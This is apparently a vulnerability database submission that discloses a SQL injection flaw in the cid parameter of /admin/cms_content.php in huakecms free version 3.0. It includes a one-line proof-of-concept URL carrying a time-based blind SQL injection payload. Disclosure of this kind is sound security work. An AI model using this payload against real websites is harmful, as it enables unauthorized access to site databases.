| Title | huakecms free version 3.0 was discovered to contain a SQL injection vulnerability |
|---|
| Description | 华科网站管理系统免费版3.0 (huakecms free version 3.0) is a set of intelligent website building software based on PHP! The product has the characteristics of a novel and beautiful interface, dynamic and fashionable, etc. It is a CMS content management system serving small and medium-sized enterprises. The threshold for using the software is low, no professional computer knowledge is required, full back-end operation management, simple operation and powerful functions, and the software also has extremely strong scalability and can adapt to the different needs of various industries.
[Suggested description]
huakecms free version 3.0 was discovered to contain a SQL injection vulnerability in /admin/cms_content.php
[Vulnerability Type]
SQL INJECTION
[Vendor of Product]
http://www.huakecms.com/
[Affected Product Code Base]
huakecms free version Dev 3.0
[Affected Component]
File: /admin/cms_content.php
Parameter: cid
[Attack Type]
Remote
[poc]
http://localhost:8086/admin/cms_content.php?key=t&type=&search=%E7%BB%BC%E5%90%88%E6%9D%A1%E4%BB%B6%E6%9F%A5%E8%AF%A2&cid=1 AND (SELECT 3158 FROM (SELECT(SLEEP(5)))YkeQ) |
|---|
| Source | https://github.com/yhy217/huakecms-vul/issues/1 |
|---|
| User | jamspilly (UID 54414) |
|---|
| Submission | 19.09.2023 07:00 (3 years ago) |
|---|
| Moderation | 29.09.2023 07:38 (10 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 240877 [huakecms 3.0 /admin/cms_content.php cid SQL Injection] |
|---|
| Points | 20 |
|---|